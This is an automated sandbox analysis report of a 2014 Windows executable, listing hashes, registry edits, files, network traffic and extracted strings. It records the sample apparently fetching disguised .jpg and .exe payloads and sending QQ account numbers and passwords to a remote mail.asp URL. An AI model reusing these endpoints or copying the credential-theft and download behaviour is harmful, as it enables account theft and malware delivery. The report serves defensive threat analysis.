Analysis Date: 2014-08-29 03:10:52
MD5: 4455b23accfeedf6eaa29748ee69ad57
SHA1: cd72e0b7dcd3bc39888cf10724e985696219c589

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 05d6777493c0dd512522fdc798aa2d0a sha1: 391c874311c18f1d665cb5ee4c4dff7f805a3507 size: 221184
Section: .rdata md5: 10602b53e34e2052f6673533bb0883ba sha1: 788eaa87c013103e46817b59b708c6228563c202 size: 24576
Section: .data md5: b21b39ba2f7fcd062f8ddf18a2b779df sha1: 2fe7eb19b9ad3144805a74480fe874aba8f6536c size: 135168
Timestamp: 2014-08-23 14:20:12
Packer: Microsoft Visual C++ v6.0
PEhash: 5a581cf5311060d0a5557679f63885e2975692a0
IMPhash: 4cf7b7ee19eb993a8daf341fa24c66ed

Runtime Details:

Process:
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝ http://www.duba.com/?un_2_445816\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝ NULL
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.qq.com
Winsock URL: http://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword= 6

Network Details:

HTTP GET: http://www.soso56.com/asdqw_3104-48740.jpg
User-Agent: DownJet1.0
HTTP GET: http://d3.freep.cn/3tb_140818092254lkmy537913.jpg
User-Agent: DownJet1.0
HTTP GET: http://d3.freep.cn/3tb_1408220915588uva538112.jpg
User-Agent: DownJet1.0
HTTP GET: http://d2.freep.cn/3tb_140822092250fy1p538112.jpg
User-Agent: DownJet1.0
HTTP GET: http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: DownJet1.0
HTTP GET: http://d3.freep.cn/3tb_140822173106dyxl538112.jpg
User-Agent: DownJet1.0
HTTP GET: http://d2.freep.cn/3tb_140822174145xr9r538112.jpg
User-Agent: DownJet1.0
HTTP GET: http://d3.freep.cn/3tb_140822172706ahch538112.jpg
User-Agent: DownJet1.0
HTTP GET: http://d2.freep.cn/3tb_140810210616ab0y536124.jpg
User-Agent: DownJet1.0
HTTP GET: http://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Raw Pcap

Strings
- not enough space for thread data
November
NTDLL.DLL
NtReadVirtualMemory
(null)
Object Descriptor
ObjectLink
October
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OLEPRO32.DLL
OleRun
OleUninitialize
`omni callsig'
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
operator
OwnerLink
__pascal
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=0
PCMgr=1
PeekMessageA
Ph_^][Y
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
ppxxxx
PreviewPages
Process32First
Process32Next
Program: 
program internal error number is %d. 
<program name unknown>
PtInRect
__ptr64
PtVisible
- pure virtual function call
PWVWWW
&qqpassword=  
QQPCTray.exe
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QueryPerformanceCounter
RaiseException
RARCloseArchive
RAROpenArchiveEx
RARProcessFile
RARReadHeader
RARSetCallback
RARSetPassword
`.rdata
ReadProcessMemory
RectVisible
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegDisableReflectionKey
REG_DWORD - DWORD
Regedit 
RegEnableReflectionKey
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
REG_SZ - 
ReleaseDC
RemoveDirectoryA
RemoveMenu
RemovePropA
RestoreDC
__restrict
RichEdit Text and Objects
Rich Text Format
RPWWWj
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
:"%s".
Safe=0
Saturday
SaveDC
`scalar deleting destructor'
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
scripting.FileSystemObject
SelectObject
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetClassLongA
SetCursor
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPropA
SetRect
SetStdHandle
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
shell32.dll
SHELL32.dll
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShowWindow
ShowWindowAsync
SING error
sO;>|C;~
software
Software\Microsoft\Internet Explorer\Main
SoHu=0
s[S;7|G;w
SS@SSPVSS
_SSSSU
StartAuto=1
Start Page
__stdcall
StretchBlt
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SusWnd
SysPager
System
SystemParametersInfoA
SystemRoot
\SystemRoot
t0WWWWW
t@_^]3
t'9|$pt
t	9p$u
t^9(uZ
TabbedTextOutA
TargetPath
TaskbarCreated
taskmgr.exe
tb9} u
tD9_Pt?
tD9(u@
tehDL@
\TemporaryFile
\....\TemporaryFile
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
t>Ht Ht
t+Ht$Ht
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
ToolbarWindow32
tq9w(tlSj
tR99u2
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
TrayNotifyWnd
t#SSUP
+ttHHtd
t.;t$$t(
Tuesday
;t$,v-
t$$VSS
tvWWWWU
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
`udt returning'
uf9=|VG
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
\uninst.exe
Unknown exception
unrar.dll
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
URPQQhl
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
User-Agent: DownJet1.0
\$(UVW
ValidateRect
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualQueryEx
v	N+D$
,&[vrH
VWhkWC
WaitForSingleObject
Wednesday
WideCharToMultiByte
WinExec
WinHelpA
wininet.dll
WININET.dll
WINSPOOL.DRV
woqqqainima de a
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
\WPS Office 
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
wshom.ocx
WshShell
wsprintfA
WTWindow
WwktZ=
xppwpp
xpxxxx
>=Yt/j
_^][YY
\yyfm0529
YYu-9D$
YYuTVWh
Z9K|uU
ZwQueryInformationProcess